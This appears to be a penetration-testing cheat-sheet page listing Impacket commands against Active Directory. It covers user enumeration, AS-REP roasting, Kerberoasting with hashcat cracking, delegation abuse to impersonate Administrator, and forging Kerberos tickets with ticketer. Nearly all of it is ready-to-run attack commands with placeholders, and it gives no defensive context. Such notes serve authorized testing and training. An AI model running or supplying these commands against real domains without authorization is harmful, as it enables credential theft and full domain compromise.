Impacket

GETADusers

GetADUsers.py -dc-ip 10.10.10.248 -all domain.local/user

GetNPUsers

Python GetNPUsers.py <domain_name>/<Domain_user>:<domain_Pass> -usersfile users.txt -format <hashcat | john>

GetUserSPN

python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file> -request

crack using hashcat -m 13100

getST

getSTS.py domain.local/SVC -spn WWW/dc.domain.local -hashes <HASH> -impersonate Administrator

Ticketer:

ticketer.py -spn "spn/DC.DOMAIN.LOCAL" -user "USER" -password "PASSWORD" -nthash "NTHASH-USECYBERCHEF" -domain DOMAIN.LOCAL -domain-sid "DOMAIN-OBJECT-SID" -dc-ip DC.DOMAIN.LOCAL Administrator

PreviousNTDS dumping NextADCS exploitation

Last updated 2 years ago